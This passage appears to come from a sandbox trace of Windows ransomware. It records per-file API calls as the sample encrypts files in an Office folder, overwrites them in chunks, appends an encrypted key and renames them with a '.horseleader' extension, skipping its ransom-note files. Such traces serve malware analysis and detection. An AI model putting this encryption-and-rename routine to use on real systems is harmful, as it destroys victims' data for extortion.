ftCreationTime.dwLowDateTime=0x8054ff00, ftCreationTime.dwHighDateTime=0x1cb7011, ftLastAccessTime.dwLowDateTime=0xcf47ffa0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x8054ff00, ftLastWriteTime.dwHighDateTime=0x1cb7011, nFileSizeHigh=0x0, nFileSizeLow=0x6190, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="MUOPTIN.DLL", cAlternateFileName="")) returned 1 [0244.302] lstrcmpiW (lpString1="MUOPTIN.DLL", lpString2="Windows") returned -1 [0244.303] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL") returned 71 [0244.303] StrStrIW (lpFirst="MUOPTIN.DLL", lpSrch=".horseleader") returned 0x0 [0244.303] lstrcmpW (lpString1="MUOPTIN.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.303] lstrcmpW (lpString1="MUOPTIN.DLL", lpString2="_uninstalling_.png") returned 1 [0244.303] lstrlenW (lpString=".testttjffg") returned 11 [0244.303] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL", lpSrch=".testttjffg") returned 0x0 [0244.303] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.303] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.303] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muoptin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.305] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL") returned 71 [0244.305] StrStrW (lpFirst="MUOPTIN.DLL", lpSrch=".txt") returned 
0x0 [0244.305] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=24976) returned 1 [0244.305] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.315] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.315] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.315] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x1190, lpOverlapped=0x0) returned 1 [0244.316] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffee70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.316] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x1190, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x1190, lpOverlapped=0x0) returned 1 [0244.316] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.316] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.316] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) 
returned 1 [0244.316] CloseHandle (hObject=0x158) returned 1 [0244.317] GetProcessHeap () returned 0x780000 [0244.317] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.317] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL.horseleader") returned 83 [0244.317] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muoptin.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\MUOPTIN.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\muoptin.dll.horseleader")) returned 1 [0244.318] GetProcessHeap () returned 0x780000 [0244.318] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.318] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x161d5800, ftCreationTime.dwHighDateTime=0x1cbd856, ftLastAccessTime.dwLowDateTime=0xd63a22c0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x161d5800, ftLastWriteTime.dwHighDateTime=0x1cbd856, nFileSizeHigh=0x0, nFileSizeLow=0x38d88, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Oarpmany.exe", cAlternateFileName="")) returned 1 [0244.318] lstrcmpiW (lpString1="Oarpmany.exe", lpString2="Windows") returned -1 [0244.318] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe") returned 72 [0244.318] StrStrIW (lpFirst="Oarpmany.exe", lpSrch=".horseleader") returned 0x0 [0244.318] lstrcmpW (lpString1="Oarpmany.exe", lpString2="#Decrypt#.txt") returned 1 [0244.318] lstrcmpW (lpString1="Oarpmany.exe", 
lpString2="_uninstalling_.png") returned 1 [0244.318] lstrlenW (lpString=".testttjffg") returned 11 [0244.318] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe", lpSrch=".testttjffg") returned 0x0 [0244.318] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.319] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.319] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\oarpmany.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.320] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe") returned 72 [0244.320] StrStrW (lpFirst="Oarpmany.exe", lpSrch=".txt") returned 0x0 [0244.320] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=232840) returned 1 [0244.320] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.320] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.324] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.324] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, 
lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.325] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x19ec4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.325] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.325] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.325] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.325] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x33d88, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.325] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.327] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.328] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.328] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.328] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, 
lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.328] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.328] CloseHandle (hObject=0x158) returned 1 [0244.328] GetProcessHeap () returned 0x780000 [0244.328] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.328] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe.horseleader") returned 84 [0244.329] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\oarpmany.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Oarpmany.exe.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\oarpmany.exe.horseleader")) returned 1 [0244.330] GetProcessHeap () returned 0x780000 [0244.330] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.330] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7f9d2900, ftCreationTime.dwHighDateTime=0x1cab9ac, ftLastAccessTime.dwLowDateTime=0xbe0f9da0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0x7f9d2900, ftLastWriteTime.dwHighDateTime=0x1cab9ac, nFileSizeHigh=0x0, nFileSizeLow=0x7568, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="ODBCMON.DLL", cAlternateFileName="")) returned 1 [0244.330] lstrcmpiW (lpString1="ODBCMON.DLL", lpString2="Windows") returned -1 [0244.330] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL") returned 71 [0244.330] StrStrIW (lpFirst="ODBCMON.DLL", lpSrch=".horseleader") returned 0x0 [0244.330] lstrcmpW (lpString1="ODBCMON.DLL", lpString2="#Decrypt#.txt") returned 1 [0244.330] lstrcmpW (lpString1="ODBCMON.DLL", lpString2="_uninstalling_.png") returned 1 [0244.330] lstrlenW (lpString=".testttjffg") returned 11 [0244.330] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL", lpSrch=".testttjffg") returned 0x0 [0244.330] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0244.330] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0244.330] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\odbcmon.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0244.331] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL") returned 71 [0244.331] StrStrW (lpFirst="ODBCMON.DLL", lpSrch=".txt") returned 0x0 [0244.331] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=30056) returned 1 [0244.331] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.334] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.334] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, 
nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0244.337] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x2568, lpOverlapped=0x0) returned 1 [0244.338] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffda98, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.338] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x2568, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x2568, lpOverlapped=0x0) returned 1 [0244.338] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.338] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0244.338] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0244.338] CloseHandle (hObject=0x158) returned 1 [0244.339] GetProcessHeap () returned 0x780000 [0244.339] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.339] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL.horseleader") returned 83 [0244.339] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL" (normalized: "c:\\program files\\common files\\microsoft 
shared\\office14\\odbcmon.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ODBCMON.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\odbcmon.dll.horseleader")) returned 1 [0244.340] GetProcessHeap () returned 0x780000 [0244.340] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0244.340] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbe974c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe974c00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="Office Setup Controller", cAlternateFileName="OFFICE~1")) returned 1 [0244.340] lstrcmpiW (lpString1="Office Setup Controller", lpString2="Windows") returned -1 [0244.340] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller") returned 83 [0244.340] lstrcmpW (lpString1="Office Setup Controller", lpString2=".") returned 1 [0244.340] lstrcmpW (lpString1="Office Setup Controller", lpString2="..") returned 1 [0244.340] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.340] GetProcessHeap () returned 0x780000 [0244.340] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0244.340] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\*") returned 85 [0244.340] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbe974c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe974c00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0244.343] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.343] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\.") returned 85 [0244.343] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.343] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xbe974c00, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xbe974c00, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="..", cAlternateFileName="")) returned 1 [0244.344] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.344] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\..") returned 86 [0244.344] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.344] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.344] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, 
ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17bd2750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0244.344] lstrcmpiW (lpString1="Access.en-us", lpString2="Windows") returned -1 [0244.344] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us") returned 96 [0244.347] lstrcmpW (lpString1="Access.en-us", lpString2=".") returned 1 [0244.347] lstrcmpW (lpString1="Access.en-us", lpString2="..") returned 1 [0244.347] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.348] GetProcessHeap () returned 0x780000 [0244.348] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0244.348] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\*") returned 98 [0244.348] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17bd2750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 
[0244.351] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.351] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\.") returned 98 [0244.351] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.351] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x15419830, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x17bd2750, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x17bd2750, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="..", cAlternateFileName="")) returned 1 [0244.351] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.351] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\..") returned 99 [0244.351] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.351] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.351] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa5fe940, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x15419830, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfa5fe940, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x545, dwReserved0=0xf4c33fb5, dwReserved1=0xbd706974, cFileName="AccessMUI.XML", cAlternateFileName="ACCESS~1.XML")) returned 1 [0244.351] lstrcmpiW (lpString1="AccessMUI.XML", lpString2="Windows") returned -1 [0244.351] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML") returned 110 [0244.351] StrStrIW (lpFirst="AccessMUI.XML", lpSrch=".horseleader") returned 0x0 [0244.352] lstrcmpW (lpString1="AccessMUI.XML", lpString2="#Decrypt#.txt") returned 1 [0244.352] lstrcmpW (lpString1="AccessMUI.XML", lpString2="_uninstalling_.png") returned 1 [0244.352] lstrlenW (lpString=".testttjffg") returned 11 [0244.352] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML", lpSrch=".testttjffg") returned 0x0 [0244.352] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.352] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.352] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 